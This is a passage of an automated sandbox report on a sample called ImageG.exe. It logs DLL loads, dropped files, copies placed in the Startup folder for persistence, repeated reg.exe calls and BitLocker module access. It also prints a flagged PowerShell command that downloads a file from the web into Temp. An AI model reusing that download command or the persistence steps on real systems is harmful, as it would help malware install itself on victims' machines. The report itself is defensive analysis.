        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Users\user\Desktop\ImageG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDirectory created: C:\Program Files\Windows NT\TableTextService\ImageG.exeJump to behavior
        Source: ImageG.exeStatic file information: File size 76124537 > 1048576
        Source: ImageG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: hell.PSReadline.pdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
        Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
        Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
        Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
        Source: ImageG.exe.0.drStatic PE information: section name: .00cfg
        Source: ImageG.exe.0.drStatic PE information: section name: .gxfg
        Source: ImageG.exe.0.drStatic PE information: section name: .retplne
        Source: ImageG.exe.0.drStatic PE information: section name: .rodata
        Source: ImageG.exe.0.drStatic PE information: section name: CPADinfo
        Source: ImageG.exe.0.drStatic PE information: section name: LZMADEC
        Source: ImageG.exe.0.drStatic PE information: section name: _RDATA
        Source: ImageG.exe.0.drStatic PE information: section name: malloc_h
        Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
        Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
        Source: libEGL.dll.0.drStatic PE information: section name: .retplne
        Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
        Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
        Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
        Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
        Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
        Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
        Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
        Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
        Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
        Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
        Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
        Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
        Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
        Source: ffmpeg.dll0.0.drStatic PE information: section name: .00cfg
        Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
        Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
        Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
        Source: ImageG.exe0.0.drStatic PE information: section name: .00cfg
        Source: ImageG.exe0.0.drStatic PE information: section name: .gxfg
        Source: ImageG.exe0.0.drStatic PE information: section name: .retplne
        Source: ImageG.exe0.0.drStatic PE information: section name: .rodata
        Source: ImageG.exe0.0.drStatic PE information: section name: CPADinfo
        Source: ImageG.exe0.0.drStatic PE information: section name: LZMADEC
        Source: ImageG.exe0.0.drStatic PE information: section name: _RDATA
        Source: ImageG.exe0.0.drStatic PE information: section name: malloc_h
        Source: ImageG.exe4.2.drStatic PE information: section name: .fptable
        Source: 797897d5-a581-42d8-bf0e-306300e4549c.tmp.node.2.drStatic PE information: section name: _RDATA

        Persistence and Installation Behavior

        barindex
        Tries to download and execute files (via powershell)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Uses cmd line tools excessively to alter registry or file data
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: reg.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\db804694-6538-41b3-8e68-e762db905f28.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\76aeac75-a5b5-4872-b3c5-27d2191829fa.tmp.nodeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\ImageG.exeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\d3dcompiler_47.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\nsis7z.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\2676205f-d0b6-44b9-8574-4cede5e50ea9.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Microsoft\MagTable\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\797897d5-a581-42d8-bf0e-306300e4549c.tmp.nodeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libEGL.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\ffmpeg.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\resources\elevate.exeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vk_swiftshader.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Program Files\Windows NT\TableTextService\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\ImageG.exeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vulkan-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ffmpeg.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libGLESv2.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\db715fb8-1e47-440d-93b6-4939c549fe98.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\db804694-6538-41b3-8e68-e762db905f28.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\db715fb8-1e47-440d-93b6-4939c549fe98.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\797897d5-a581-42d8-bf0e-306300e4549c.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\2676205f-d0b6-44b9-8574-4cede5e50ea9.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\76aeac75-a5b5-4872-b3c5-27d2191829fa.tmp.nodeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\LICENSE.electron.txtJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\LICENSE.electron.txtJump to behavior

        Boot Survival

        barindex
        Drops PE files to the startup folder
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exe\:Zone.Identifier:$DATAJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
